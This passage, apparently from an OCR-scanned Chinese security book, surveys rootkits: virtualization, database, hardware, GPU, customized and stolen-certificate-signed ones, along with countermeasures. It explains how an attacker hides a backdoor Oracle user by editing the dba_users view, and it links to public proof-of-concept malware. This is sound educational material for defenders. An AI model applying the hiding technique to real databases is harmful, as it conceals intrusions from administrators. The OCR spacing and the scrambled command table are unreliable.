位 为 1 启用 SVM。 也 就 是 说 ， 如 果 不 能 在 代码 中 启用 或 者 禁用 SVM Blue Pi 将 不 能 运行 。 


使 用 概念 验证 型 代码 ， 很 可 能 在 不 远 的 将 来 还 有 更 多 虚拟 Rootkit 发 布 。 虽 然 关于 HVM 可 疑 的 “100% 不 可 检测 ”特性 的 争 
论 仍 在 持续 ， 但 是 并 不 能 改变 这 些 Rootkit 存 在 并 且 代 表 着 不 断 增长 的 威胁 这 一 事实 。 


54 小结 


回顾 虚拟 Rootkit 的 类 型 ， 这 3 种 类 型 都 必须 能 够 确定 自己 处 于 虚拟 环境 。 但 是 ， 虚 拟 感知 恶意 软件 正在 消亡 。 正 如 SubVirt 
的 作者 所 指出 的 ， 恶 意 软件 最 终 别 无 选择 ， 一 定 要 在 虚拟 环境 中 运行 ， 因 为 数据 中 心 和 大 型 商业 和 政府 组 织 正在 持续 地 将 传统 的 
物理 资产 移植 到 虚拟 资产 中 。 恶 意 软件 作者 不 得 不 接受 他 们 将 在 虚拟 环境 中 受到 监控 的 可 能 性 ， 因 为 从 主机 系统 上 得 到 的 收益 将 
会 超过 被 发 现 和 分 析 的 风险 。 实 质 上 ，VM 检 测 的 问题 对 恶意 软件 来 说 将 不 成 问题 。 


对 于 代表 高 级 虚拟 Rootkit 的 其 余 类 型 ， 即 VMBR 和 HVM Rootkit， 研 究 人 员 和 Blue Pi 的 作者 已 经 就 讨论 过 的 检测 方法 
(时 间 、 资 源 和 逻辑 异常 ) 实际 上 是 检测 Blue Pil 本 身 还 是 仅仅 检测 SVM 虚拟 化 的 人 存在 进行 了 激烈 的 争论 。 这 一 争论 归结 到 是 否 
假设 未 来 的 计算 机 系统 是 否 100% 都 是 虚拟 化 的 。 如 果 全 都 实现 了 虚拟 化 ， 那 么 主 操作 系统 检测 自己 处 于 VM 中 就 之 无 意义 。 
Blue Pil 作 者 站 在 这 一 出 发 点 上 ， 将 当前 的 VM 检 测 技术 的 发 现 比 作 将 系统 中 存在 网 络 活动 作为 僵尸 网 络 的 证 据 。 


除了 这 些 争论 以 外 ，Blue Pill 作 者 还 提出 了 一 些 在 当时 能 够 阻止 所 有 HVM Rootkit (也 包括 SubVirt) 的 对 策 : 
` 必要 时 在 BIOS 中 禁用 虚拟 化 支持 。 
. 未 来 的 基于 硬件 的 系统 管理 程序 ， 只 允许 加 密 签 名 的 虚拟 机 映像 装 入 。 
. “硬件 Red Pil” 或 “SVMCHECK” 一 一 要 求 唯一 密码 来 装 入 VM/ 系 统管 理 程序 的 硬件 支持 指令 。 

庶 拟 化 为 Rootkit 作 者 和 Rootkit 检 测 者 同样 带 来 了 独特 的 挑战 。 毫 无 疑问 ， 我 们 还 没有 看 到 这 一 论战 的 结果 。 


可 以 肯定 的 是 ， 系 统管 理 程序 正在 用 于 子 版 本 (它们 所 预期 的 目的 ) 之 外 的 目的 。 已 经 有 两 种 基于 系统 管理 程序 的 Rootkit 
检测 程序 发 布 : North Security Labs (http://northsecuritylabs.com/) 开发 的 Hypersight 和 Rutgers 大 学 的 学 生 开 发 的 


Rutgers (http://www.cs.rutgers.edu/~iftode/intrusion06.pdf) 。 实 际 上 这 些 工 具 做 的 事情 和 Blue Pill 一 样 ， 但 是 它们 的 目 
的 是 发 现 并 且 彻 底 阻 止 虚拟 和 传统 Rootkit 装 入 。 


第 6 章 ”Rootkit 的 未 来 


与 当今 的 其 他 技术 一 样 ，Rootkit 也 在 发 展 和 演变 。 随 着 目标 操作 系统 新 版 本 的 发 行 ，Rootkit 开 发 者 必须 找 出 方法 ， 跟 上 和 
适应 变化 的 操作 系统 环境 。 他 们 必须 理解 绑架 新 操作 系统 所 需 的 不 同 技术 。 这 是 重要 的 工作 ， 因 为 Rootkit 使 攻击 者 在 维持 未 授 
权 访 问 方面 居于 优势 。 


你 已 经 学 习 了 Rootkit 使 用 的 各 种 攻击 和 方法 ， 以 及 Rootkit 修 改 用 户 环境 、 哄 骗 用 户 相 信 不 存在 攻击 者 的 方法 。Rootkit 已 
经 演变 成 一 种 更 复杂 、 更 难以 缓解 的 技术 ， 就 像 简单 的 病毒 演变 成 更 加 危险 的 恶意 软件 ， 它 们 更 具 破 坏 力 。 


发 展 Rootkit 需 要 许多 攻击 者 所 不 具备 的 技能 水 平 。Rootkit 包 括 了 对 现 有 系统 功能 的 回避 或 者 扩展 ， 这 要 求 对 内 核 级 别 编 
程 、 驱 动 程序 开发 的 理解 ， 或 者 在 传统 编程 课程 中 不 曾 传授 的 深入 的 用 户 空 间 编 程 。 具 体 地 说 ， 建 立 许多 当今 的 Rootkit 所 需要 
的 环境 对 于 传统 编程 人 员 来 说 并 不 容易 获得 。 传 统 编 程 人 员 必 须 安装 特殊 的 软件 开发 包 (SDK) 并 且 建 立 环境 ， 才 能 编译 和 分 发 
Rootkit。 


但 是 ，Rootkit 开 发 人 员 开 始 将 Rootkit 打 包 为 模块 ， 并 且 培 训 Rootkit 用 户 如 何 修改 以 及 使 Rootkit 适 应 特殊 的 用 途 。 而 且 ， 
公开 的 Rootkit 代 码 在 Rootkit.com 这 样 的 网 站 上 可 以 获得 ， 这 也 减少 了 将 Rootkit 成 功 地 整合 到 其 他 软件 中 的 技术 知识 要 求 。 这 
种 整合 往往 只 需要 简单 地 复制 和 粘贴 代码 ， 然 后 测试 以 确保 其 工作 ， 使 技能 较 低 的 Rootkit 作 者 也 能 很 轻松 地 获得 
Rootkit，Rootkit 可 以 较为 容易 地 为 有 意 者 所 用 。 


基于 内 核 的 Rootkit 和 用 于 检测 Microsoft Windows 环 境 中 Rootkit 的 技术 基于 经 过 证 明 的 技术 。 远 离 内 核 级 别 的 系统 服务 
描述 表 (SSDT) 钩子 、 添 加 特殊 功能 以 避免 被 流行 的 Rootkit 检 测 软件 发 现 的 尝试 ， 是 Rootkit 领 域 的 真正 创新 。 遗 憾 的 是 ， 仅 
凭 这 一 手段 ， 就 足以 使 攻击 者 领先 一 步 。 由 于 技能 较 低 的 攻击 者 越 来 越 容易 使 用 Rootkit，Rootkit 的 类 型 和 目的 也 随 之 改变 。 有 
创新 精神 的 攻击 者 开始 利用 Rootkit 概 念 〈 如 隐蔽 性 ) 和 新 的 部 署 方 向 ， 以 保证 他 们 对 数据 库 、 整 个 PC 和 系统 的 利用 不 会 被 发 
现 。 


6.1 ”复杂 性 和 隐蔽 性 的 改进 


由 于 攻击 者 和 防御 者 之 间 不 断 的 竞争 ，Rootkit 的 未 来 很 有 可 能 与 病毒 和 蠕虫 相似 ; 在 欺骗 、 隐 蔽 和 避免 被 业界 出 现 的 单独 
Rootkit 检 测 工具 所 发 现 等 方面 逐步 地 进行 革新 。 代 码 片 段 和 容易 取得 的 Rootkit 依 赖 的 技术 是 在 21 世 纪 初 引入 的 ， 当 时 操作 系统 
供应 商 如 Microsoft 和 Linux 还 没有 如 此 强烈 地 关注 安全 。 对 于 Windows Server2008、Windows7、8 和 10 以 及 集成 了 内 核 补 丁 
的 Linux，Rootkit 更 加 难以 在 内 核 模 式 或 者 用 户 模式 下 操作 而 将 被 迫 进 入 系统 的 应 用 程序 级 别 。 安 全 供应 商 和 软件 开发 商 如 
Microsoft 开 始 实施 安全 体系 结构 评估 、 源 代码 评估 以 及 其 他 安全 度量 ， 以 确保 类 似 Rootkit 的 应 用 程序 不 能 利用 操作 系统 的 内 核 
模式 或 者 用 户 模式 部 分 。 防 御 者 在 竞争 中 已 经 提高 了 一 步 ， 所 以 攻击 者 必须 放弃 OS 中 的 嵌入 式 Rootkit 和 用 户 空间 ,而 将 
Rootkit 功 能 如 隐蔽 性 和 后 门 功 能 在 应 用 程序 (如 CRM 或 者 数据 库 ) 本 身 中 提供 。 


随 着 Rootkit 合 并 到 应 用 程序 层 ， 越 来 越 多 的 混合 型 威胁 ， 或 者 包含 不 同类 型 恶意 软件 (如 使 用 病毒 感染 文件 的 蠕虫 ,或 者 
使 用 Rootkit 隐 藏 的 病毒 ) 的 威胁 已 成 为 标准 。 Rootkit 检 测 技术 将 成 为 防 病毒 和 防 间谍 软件 供应 商 的 需求 ; 否则 他 们 将 无 法 发 现 


这 些 威胁 。 


Rootkit 的 安装 方向 也 因为 混合 型 的 威胁 而 改变 ， 从 单独 的 安装 转向 与 现 有 恶意 软件 更 深入 的 集成 ， 特 别 是 由 用 户 有 意 安装 
的 恶意 软件 类 型 ， 如 屏幕 保护 程序 、 应 用 程序 或 者 广告 软件 支持 的 应 用 程序 。 Rootkit 感 染 将 涉及 较 小 的 注入 方向 ， 启 用 运行 中 
下 载 Rootkit 安 装 ， 这 样 可 以 为 低 技 能 的 攻击 提供 模块 性 和 Rootkit 功 能 的 重用 。 


检测 一 个 Rootkit 只 是 问题 的 一 部 分 。 删 除 Rootkit 使 受 其 保护 的 其 他 威胁 如 木马 、 广 告 软件 或 者 病毒 得 以 处 理 可 能 是 无 法 实 
现 的 ， 如 果 试 图 删除 ， 可 能 导致 严重 的 数据 丢失 或 者 系统 不 稳定 。 越 来 越 多 的 防 病毒 软件 和 安全 供应 商 将 需要 遵循 一 个 消除 杀伤 
力 的 过 程 而 不 是 现在 我 们 所 了 解 和 使 用 的 “清除 ”过 程 。 例 如 ， 你 可 能 删除 了 Rootkit 使 用 的 实际 文件 (如 内 核 驱动 程序 或 
者 .dll) 并 且 重 新 启动 。 这 种 清除 过 程 是 安全 软件 一 般 的 操作 ; 但 是 ， 这 需要 供应 商 的 研究 人 员 了 解 每 个 文件 、 注 册 表 项 等 ， 删 
除了 这 些 项 目 才能 保证 威胁 已 经 正确 地 清除 。 这 个 任务 是 时 间 密 集 型 的 并 且 容 易 出 错 。 如 果 遗 漏 了 一 个 文件 导致 Rootkit 重 新 安 
装 怎么 办 呢 ? 通 过 禁用 钩子 、 避 免 钧 子 或 者 设置 目录 权限 以 避免 Rootkit 的 子 组 件 运行 等 手段 ， 使 Rootkit 的 核心 功能 不 能 操作 ， 
从 而 消除 Rootkit 的 杀伤 力 ， 这 样 就 能 确保 成 功 并 且 不 需要 担心 遗漏 需要 清除 的 一 个 文件 或 者 注册 表 键 值 。 这 样 ， 研 究 人 员 就 无 
须 担心 遗漏 需要 清理 的 文件 或 者 注册 表 键 值 。 





注意 : 在 清理 过 程 中 重启 系统 是 无 法 避免 的 。 大 部 分 防 恶 意 软 件 公 司 都 痛恨 必须 重启 这 一 事实 ， 因 为 这 直接 影响 了 效率 和 业 
务 持续 性 。 它 们 竞相 研究 不 需要 重启 而 删除 Rootkit 的 方法 。 但 是 还 没有 人 取得 完全 的 成 功 ， 在 这 方面 ，Rootkit 仍 然 占据 上 风 。 
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美国 联邦 政府 和 IT 治理 框架 总 是 给 各 个 组 织 施加 压力 ， 要 求 其 保护 自己 的 数据 ， 数 据 库 是 许多 攻击 者 策略 的 核心 ， 因 为 他 们 


进行 数据 盗窃 (主要 是 身份 盗 穷 ) 所 需 的 数据 存储 在 数据 库 中 。 令 人 难过 的 是 ， 并 不 是 所 有 组 织 都 部 署 了 数据 库 安 全 技术 ， 许 多 
组 织 没 有 积极 部 署 数据 库 安全 协议 或 者 最 佳 实践 。 


尽管 数据 库 Rootkit 在 2005 年 由 Alexander Kornburst 在 Red Database Security GmbH 会 议 上 引入 。 数 据 库 Rootkit 技 术 的 
新 进展 以 及 预制 的 数据 库 Rootkit 的 销售 ， 加 速 了 其 开发 和 部 署 。 我 们 在 过 去 几 年 见 到 的 数据 转 储 可 能 归功 于 用 这 些 信息 盗窃 攻 
击 的 数据 库 Rootkit。 


数据 库 Rootkit 的 形式 可 能 是 因为 数据 库 服务 器 具有 一 个 与 操作 系统 非常 相似 的 体系 结构 。 数 据 库 服务 器 和 操作 系统 都 有 进 
程 、 作 业 、 用 户 以 及 可 执行 程序 ， 因 此 ， 第 二 部 分 的 前 几 章 讨论 的 Rootkit 技 术 可 以 直接 移植 到 数据 库 服务 器 中 ， 保 持 对 数据 库 
服务 器 中 数据 库 的 控制 。 表 6-1 详 细 列 出 了 操作 系统 命令 和 等 价 的 数据 库 命令 。 


表 6-1 操作 系统 命令 和 等 价 的 数据 库 命令 


SELECT * FROM SELECT * FROM . ， SELECT * FROM 
ps' List application 
V$PROCESS; SY SPROCESSES PG_STAT_ACTIVITY 


SELECT @VARI1 

= SPIDFROM SYS- 

ALTER SYSTEM KILL | PROCESSESWHERE 
SESSION 'SESSION-ID,| NT_USERNAME = 
SESSION-SERIAL'; 'USERNAME' AND 


Kill <process Force application 


number> (<process number>) 


SPID<>@@SPIDEXEC 


(‘KILL '+@VAR1); 
可 执行 程序 视图 、 包 、 过 程 和 函数 视图 、 存 储 过 程 视图 、 存 储 过 程 | 视图、 存储 过 程 
SELECT * FROM SELECT * FROM 
SELECT * FROM VIEW; SELECT * FROM 
Execute VIEW;EXEC PROC- VIEW; EXEC PROC- 
EXEC PROCEDURE; VIEW; 
EDURE; EDURE; 


SET CURRENT 
cd ALTER SESSION ~ 
SCHEMA=USERO1 


在 数据 库 中 实现 一 个 Rootkit 有 几 种 不 同 的 方法 。 第 一 代 的 数据 库 Rootkit 简 单 地 修改 内 部 查询 和 数据 库 依赖 的 视图 的 执行 路 
径 。 例 如 ， 我 们 来 看 看 Oracle 如 何 执行 一 个 查询 寻找 数据 库 中 的 一 个 用 户 名 : 





Select username from dba_users; 


首先 ，Oracle 执 行 名 称 解析 以 确定 dba_users 对 象 是 不 是 当前 框架 (schema) (如 表 、 视 图 或 者 过 程 ) 中 的 局 部 对 象 。 如 
果 是 局 部 对 象 ，Oracle 将 使 用 它 。 接 下 来 ，Oracle 将 验证 是 否 有 叫 作 dba_users 的 私有 同义词 (private synonym) 。 如 果 
有 ，Oracle 将 使 用 它 ， 否 则 Oracle 将 检查 dba_users 是 否 是 公共 同义词 (public synonym) ， 如 果 是 则 使 用 它 。 


这 个 过 程 对 于 理解 某 个 数据 库 对 象 的 操纵 对 Oracle 名 字 解 析 例 程 返回 的 结果 的 影响 来 说 很 重要 。 图 6-1 展 示 了 Alex 
Kornburst 的 Defcon14 报 告 中 的 各 种 Oracle 对 象 群 组 ， 这 可 以 在 Black Hat 网 站 上 获得 (http://www.blackhat.com) 。 





图 6-1 Ortacle 数 据 库 名 称 解 析 


正如 你 在 图 6-1 中 的 名 称 解析 过 程 中 所 看 到 的 ， 如 果 你 能 够 控制 所 有 同义词 ， 就 可 以 改变 原始 SQL 查询 的 结果 。 因 此 ， 为 了 
调整 结果 你 可 以 : 


. 创建 一 个 相同 名 称 的 本 地 对 象 。 

- 创建 指向 不 同 对 象 的 私有 同义词 。 
- 创建 指向 不 同 对 象 的 公共 同义词 。 
.切换 到 不 同 的 框架 。 


进行 这 种 执行 路 径 修改 攻击 的 最 有 效 途 径 是 从 数据 库 的 用 户 列 表 中 删除 一 个 用 户 。 例 如 ， 如 果 攻 击 者 添加 了 名 为 HACKER 的 
新 用 户 到 数据 库 中 ， 这 样 他 可 以 在 任何 时 间 登 录 ， 攻 击 者 可 以 修改 dba_users 对 象 (Oracle 中 的 一 个 视图 ) ， 在 应 用 程序 或 者 管 
理 员 执 行 查询 列 出 数据 库 中 用 户 时 排除 这 个 用 户 : 


SQL> select username from dba_users; 


USERNAME 


SYS 
SYSTEM 
DBSNMP 
SYSMAN 
MGMT VIEW 
OUTLN 
MDSYS 
ORDSYS 
EXFSYS 
HACKER 


现在 ， 攻 击 者 只 要 在 dba_users 视 图 的 WHERE 子 句 中 添加 一 个 附加 的 条 件 语 句 过 滤 新 用 户 名 HACKER。 对 于 Oracle， 攻 击 
者 只 要 添加 AND U.NAME! ='HACKER' 并 且 保 存 视图 就 可 以 了 。 


每 当 相信 dba_users 视 图 的 图 形 化 工具 或 者 管理 员 查 询 该 视图 ， 都 不 会 看 到 HACKER 用 户 ， 这 种 方法 虽然 简单 ， 但 是 不 完 
美 ， 因 为 其 他 也 会 列 出 用 户 的 视图 必须 更 新 ， 以 排除 HACKER 用 户 ，ALL_USERs 视 图 也 是 如 此 。 


在 Oracle 的 执行 路 径 中 ， 也 可 以 修改 对 象 来 隐藏 HACKER 用 户 拥有 的 进程 和 对 象 ， 方 法 是 修改 各 种 会 话 对 象 ， 包 括 
V_$SESSION、V_$PROCESS、GV _$SESSION 和 FLOW SESSIONS, 


PL/SQL 包 也 可 以 修改 以 执行 代码 ， 确 保 Rootkit 仍 然 安装 或 者 在 未 安装 时 重新 安装 Rootkit。 尽 管 Microsoft SQL 和 Oracle 
具有 确保 核心 包 或 者 存储 过 程 (一 组 集合 在 一 起 并 且 成 组 执行 的 SQL 语句 ) 的 集合 不 被 修改 的 技术 ， 但 是 许多 Oracle 数 据 库 用 户 
创建 的 数据 库 或 者 应 用 程序 专用 包 可 以 修改 。 而 且 ， 存 在 用 于 Oracle 某 些 版 本 展开 、 修 改 、 重 新 压缩 以 及 重新 安装 Oracle 包 的 
应 用 程序 。 这 个 问题 在 Microsoft SQL 中 不 存在 ， 因 为 它 的 视图 都 有 数字 签名 。 


Kornburst 已 经 发 布 了 一 个 能 够 在 Oracle 自 带 的 管理 工具 中 隐藏 用 户 、 进 程 和 作业 的 Oracle Rootkit 实 例 。 修 改 数据 库 可 执 
行文 件 本 身 也 可 用 于 修改 数据 库 服务 器 的 功能 ， 在 执行 特定 查询 时 使 用 不 同 的 表 、 视 图 或 者 人 存储 过 程 。 控 制 执行 路 径 可 以 使 攻击 
者 调整 和 伪造 查询 或 者 函数 返回 的 结果 。 


© 数据 库 Rootkit 对 策 


现在 有 多 种 工具 能 够 寻找 这 些 攻击 ， 如 Red-Database-Security 的 repscan 和 Application Security 公 司 的 DbProtect。 这 些 
工具 扫描 所 有 的 数据 库 对 象 ， 并 且 计 算 每 个 表 、 视 图 等 扫描 中 识别 的 对 象 的 MD5 (hash) 值 。 视 图 是 一 个 虚拟 表 ， 基 于 SQL 查 
id, 但 是 不 像 表 一 样 存储 数据 。 视 图 的 数据 在 你 访问 时 动态 生成 。 当 数据 库 安全 检测 工具 运行 时 ， 比 较 MD5 和 基准 值 来 确定 数 
据 库 是 否 被 修改 。 尽 管 这 些 工 具 能 够 检测 这 些 Rootkit， 但 是 最 佳 的 对 策 是 在 查询 数据 库 时 采用 底层 表 ， 而 不 是 视图 。 


幸运 的 是 ， 基 于 内 存 的 攻击 是 与 平台 相关 的 ， 并 且 只 在 Windows 平 台 上 的 Oracle 中 进行 过 讨论 并 出 现 过 ， 而 大 部 分 企业 不 
会 在 Windows 平 台 上 运行 Oracle。 尽 管 大 部 分 数据 库 Rootkit 都 工作 于 Oracle， 但 是 Microsoft SQL Server 也 是 容易 遭 到 攻击 
的 ，Microsoft 已 经 为 SQL Server2005 提 供 了 更 多 的 安全 特性 以 帮助 避免 数据 库 Rootkit。 这 些 修改 包括 数字 签名 视图 和 数字 签 
名 包 的 功能 。 


@ 基于 硬件 的 Rootkit 





Rootkit 从 一 开始 就 是 基于 软件 的 ， 并 且 持 续 地 为 了 控制 操作 系统 进行 永 不 停 欣 的 斗争 。 这 是 软件 之 间 的 争斗 ， 最 终 ,， 一般 
都 是 先 装 入 的 一 方 获胜 。 而 且 ， 来 自 防 病毒 公司 的 新 型 Rootkit 清 除 软件 迫使 研究 人 员 寻 找 新 的 途径 来 存储 、 装 入 和 执行 他 们 的 
Rootkit。 像 PC 的 BIOS、 图 形 卡 和 扩展 ROM (如 企业 NIC 卡 的 PXE 启 动能 力 ) 等 硬件 提供 了 新 场所 ， 使 Rootkit 代 码 可 以 安全 地 
存储 ， 从 而 避 开 基于 软件 的 检测 工具 。 


基于 硬件 的 Rootkit 已 经 快速 地 发 展 ， 因 为 它们 有 许多 年 的 基于 硬件 的 病毒 的 数据 可 供 学 习 。1998 年 ， 第 一 种 感染 硬件 的 病 
毒 CIH， 使 用 随机 的 垃圾 数据 刷新 BIOS， 使 机 器 无 法 使 用 ， 因 为 所 有 PC 都 需要 BIOS 启 动 。Rootkit 开 发 人 员 已 经 关注 于 利用 相 
同 的 方法 来 存储 Rootkit 的 代码 或 者 数据 ， 这 样 它们 可 以 在 重新 启动 、 硬 盘 格式 化 或 者 主 操作 系统 重新 安装 时 存活 下 来 。 感 染 
BIOS 的 好 处 是 带 来 更 好 的 隐蔽 性 ， 因 为 传统 的 取证 和 事故 响应 调查 不 会 分 析 像 BIOS 或 者 板 载 内 存 这 样 的 硬件 。 


目前 ， 还 不 存在 这 样 的 硬件 Rootkit; 大 部 分 用 于 实验 或 者 在 受 控 的 恶意 软件 研究 实验 室 中 构造 安全 解决 方案 。 但 是 ，NGS 
Consulting 的 John Heasman 已 经 利用 高 级 配置 和 电源 接口 (ACPI) ， 开 发 了 人 迫使 主板 硬件 修改 传统 操作 系统 进程 禁止 进入 内 
存 空 间 的 概念 验证 性 代码 。 例 如 ， 使 用 这 种 技术 ， 攻 击 者 可 以 禁用 所 有 Windows 和 Linux 中 的 安全 访问 令 牌 检查 。Heasman 还 
示范 了 ACPI 接 口 如 何 用 于 执行 像 Rootkit 装 入 程序 或 者 安装 程序 这 样 的 原生 代码 。ACPI 方 法 并 不 完美 ， 因 为 它 是 一 个 混血 
Rootkit， 需 要 软件 和 硬件 一 同 工 作 才 能 实施 ， 但 是 它 确 实 提 供 了 一 个 Rootkit 开 发 方向 的 绝 佳 范例 。 


除了 ACPI 可 以 作为 装 入 机 制 以 外 ，Heasman 还 开创 性 地 进行 了 使 用 PCI 扩 展 ROM 的 研究 ， 例 如 PCle 图 形 卡 上 的 EEPROM 
或 者 网 络 卡 上 的 EEPROM。Heasman 声 称 ， 通 过 改编 开源 的 PXE 软 件 ， 如 Etherboot/gPXE， 攻 击 者 可 以 实现 修改 过 的 gPXE 
ROM 以 下 载 恶 意 ROM ， 并 且 启 动 像 eEye BootRoot (一 种 可 以 颠覆 Windows 操 作 系 统 的 启动 扇 区 Rootkit) 这 样 的 Rootkit。 


在 2015 年 的 Black Hat 大 会 上 ，Christopher Domas 披 露 了 X86 体 系 结构 中 的 一 个 设计 漏洞 ， 这 个 漏洞 从 1997 年 之 后 未 引起 
人 们 的 注意 ， 攻 击 者 可 以 利用 它 在 处 理 器 最 深 的 层次 中 植 入 Rootkit。 可 以 在 https://www.blackhat.com/us-15/materials/us- 
15-Domas-The-Memory-Sinkhole-Unleashing-An-x86-Design-Flaw-Allowing-Universal-Privilege-Escalation-wp.pdf 上 
看 到 Domas 的 研究 论文 。 
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基于 BIOS 和 PCI 的 Rootkit 的 最 大 负担 是 需要 与 大 量 的 BIOS 变 种 和 PCI ROM 变 种 集成 。 为 一 种 NIC 或 者 BIOS 开 发 的 Rootkit 
在 另 一 个 BIOS 版 本 上 可 能 无 法 工作 。 而 且 ， 芯 片 制造 商 如 Intel 和 AMD 已 经 在 致力 于 主动 预防 这 些 攻击 类 型 的 方法 ， 例 如 可 信 平 
GRR (TPM) 。TPM 是 一 个 存在 于 主板 上 的 微 控制 器 ， 为 主机 提供 加 密 和 密 钥 管理 。TPM 还 包含 平台 专用 的 度量 hash， 可 以 
用 于 确保 只 执行 来 自 原始 制造 商 的 ROM。 最 后 ，TPM 提 供 确保 无 修改 启动 的 安全 启动 功能 。 


许多 评论 和 文章 已 经 谈 到 了 关于 Rootkit 使 用 图 形 处 理 单 元 (GPU) 的 高 级 研究 。 来 自 NVidia 等 公司 的 新 型 图 形 卡 提供 了 令 
人 惊讶 的 处 理 能 力 ， 以 及 不 使 用 主机 CPU 或 者 内 存 的 真正 代码 执行 能 力 。 在 远离 主机 RAM 和 CPU 的 地 方 执行 一 个 Rootkit 或 者 隐 
藏 数据 ， 都 会 带 来 非常 好 的 隐蔽 性 。 因 为 这 些 文 章 中 所 提出 的 GPU Rootkit 将 不 访问 主机 内 存 或 者 CPU， 目 前 的 硬件 和 软件 检测 
机 制 将 无 法 工作 。 随 着 游戏 业界 持续 地 要 求 定制 的 处 理 能 力 而 将 各 种 处 理 单元 引入 普通 的 PC， 预 计 研 究 的 发 展 方向 将 会 包含 其 
他 处 理 单元 ， 例 如 物理 处 理 单元 (PPU) 和 人 工 智能 处 理 单元 (AIPU) 。 


2015 年 ， 公 开发 布 了 两 个 使 用 GPU 的 恶意 软件 : Jellyfish Rootkit 和 Demon keylogger。 作 者 Team Jellyfish 声 明 ， 这 些 恶 
意 软件 用 于 概念 验证 ， 只 用 于 教育 目的 。 作 者 将 Jellyfish 描 述 为 “一 个 基于 Linux 的 用 户 空 间 GPU Rootkit 概 念 验 证 项 目 ， 利 用 了 
来 自 Jynx (CPU) 的 LD_PRELOAD 技 术 ， 以 及 Khronos 集 团 (GPU) 开发 的 OpenCL API。 代 码 目前 支持 AMD 和 NVIDIA 的 图 
形 卡 。 但 是 ，AMDAPPSDK 也 支持 Intel。” 关 于 这 个 Rootkit 的 更 多 信息 可 以 在 https://github.com/x0r1/jellyfish 上 找到 。 


Demon keylogger 是 Team jellyfish 创 造 的 另 一 个 概念 验证 项 目 。 根 据 作 者 所 说 ，Demon keylogger 利 用 代码 注入 实现 其 
目标 。 更 多 信息 可 以 在 https://github.com/x0r1/Demon 上 找到 。 


6.2 ”定制 的 Rootkit 


定制 是 最 近 认 识 到 的 技术 上 的 好 处 之 一 。 你 可 以 购买 到 几乎 任何 东西 并 且 将 其 转换 为 符合 你 的 个 性 和 需求 的 产品 。 从 手机 和 
个 人 音乐 播放 器 等 电子 产品 到 鞋子 等 运行 产品 ， 定 制 都 在 领导 着 新 技术 革命 。Rootkit 也 不 会 无 视 这 一 趋势 。 和 恶意 软件 构建 工 
具 一 样 ，Rootkit (特别 是 用 户 模式 Rootkit) 将 使 用 自动 化 工具 构建 。 我 们 已 经 看 到 恶意 软件 构建 工具 包含 了 和 恶意 软件 一 同 部 
署 Rootkit 的 功能 。 未 来 ，Rootkit 将 进行 定制 以 提供 特殊 的 隐蔽 类 型 、 执 行路 径 变 化 以 及 重新 感染 选项 。Rootkit 将 从 简单 的 亚 
意 软 件 外 壳 发 展 为 攻击 工具 ， 攻 击 者 用 它 来 保持 对 服务 器 主动 地 感染 和 利用 。 


注意 : 在 网 络 地 下 市 场 销 售 的 Rootkit 也 提出 了 服务 水 平 协议 (SLA) ， 保 证 不 会 被 检测 出 来 。 如 果 被 发 现 ， 买 家 可 以 免费 得 
到 新 的 Rootkit 或 者 要 求 退 款 。 


想象 你 作为 一 位 管理 员 ， 尝 试 删除 一 个 恶意 软件 ， 却 发 现在 你 删除 恶意 软件 并 且 重 启 机 器 之 后 ， 硬 件 Rootkit 重 新 在 操作 系 
统 中 以 不 同 的 新 方式 重新 安装 软件 Rootkit， 这 种 Rootkit 是 你 的 防 病 毒 或 者 防 间 谍 软 件 产品 可 能 无 法 检测 的 。Rootkit 将 开始 成 
为 机 器 的 感染 管理 器 ， 确 保 恶 意 软 件 是 无 法 检测 的 或 者 在 功能 破坏 之 后 能 够 重新 安装 的 。 


防 病毒 和 防 恶意 软件 工具 需要 进行 重要 的 升级 ， 以 处 理 这 些 攻 击 类 型 。 正 如 我 们 已 经 讨论 过 的 ， 防 病毒 和 防 恶意 软件 在 大 部 


分 内 核 模式 Rootkit 的 相同 级 别 上 操作 ; 因此 ， 这 些 工 具 难 以 充分 地 删除 或 者 检测 Rootkit。 此 外 ， 亚 意 软 件 中 实现 的 检测 、 停 止 
或 者 绕 开 安 全 技术 的 功能 将 转移 到 Rootkit 中 ， 因 为 Rootkit 传 统 上 运行 在 比 恶 意 软件 更 高 的 特权 级 ， 对 机 器 有 更 多 的 控制 和 访问 
权 。 


6.3 ”数字 签名 的 Rootkit 


今天 ，64 位 系统 已 经 成 为 常规 。 当 第 一 批 64 位 系统 出 现时 ，Rootkit 作 者 在 颠覆 这 些 系统 时 遇 到 了 挑战 。 现 在 ，64 位 系统 只 
不 过 是 个 “减速 带 ”， 这 让 我 想起 几 年 前 得 到 的 一 件 BlackHat 衬 衫 ， 上 面 印 着 : “Your firewall is just a speed bump” (你 
的 防火 墙 只 是 一 个 减速 带 ) 。 


Rootkit 颠 覆 这 些 系统 的 最 常见 方式 是 使 用 从 合法 公司 盗 取 的 数字 签名 证 书 。 然 后 ， 使 用 这 些 证 书签 署 Rootkit。 根 据 
McAfee 的 说 法 ， 从 2012 年 起 ， 至 少 有 21 种 不 同 的 64 位 Rootkit 已 经 使 用 了 窃取 的 数字 签名 证 书 。W64/Winnti 就 是 使 用 这 种 技 
术 的 恶意 软件 之 一 。 更 多 信息 可 以 在 http://www.mcafee.com/cf/security-awareness/articles/rise-of-rootkits.aspx 找 到 。 


预计 这 类 Rootkit 还 会 继续 出 现 。 窃 取 数 据 签名 证 书 是 安全 供应 商 无 法 控制 的 行为 。 保 护 这 些 证 书 的 责任 在 于 它们 的 拥有 
者 。 他 们 必须 保护 这 些 资产 的 安全 ， 否 则 攻击 者 很 容易 窃取 它们 并 用 在 自己 的 活动 中 。 如 何 阻止 内 核 中 安装 数字 签名 的 驱动 程 
Fr? 到 那个 时 候 ， 一 切 都 为 时 已 晚 ， 恶 意 软 件 已 经 在 系统 中 立足 。 


6.4 小 结 


与 病毒 革新 为 具有 侵略 性 的 身份 盗窃 恶意 软件 类 似 ，Rootkit 持 续 发 展 为 更 难以 探测 的 、 可 定制 的 和 自动 化 的 软件 。Rootkit 
正在 适应 新 的 环境 ， 如 数据 库 和 应 用 程序 ， 并 且 从 操作 系统 中 转移 到 PC 硬件 上 ， 以 便 保 持 安装 和 工作 状态 。 目 前 ， 概 念 验证 恶 
意 软件 已 经 公开 发 布 ， 说 明 这 些 情况 都 可 能 发 生 。 


Rootkit 的 定制 将 推动 与 当今 防 病毒 和 防 恶 意 软件 技术 相似 的 新 的 检测 需求 。 最 近 公开 发 布 的 硬件 Rootkit 已 经 引起 了 研究 人 
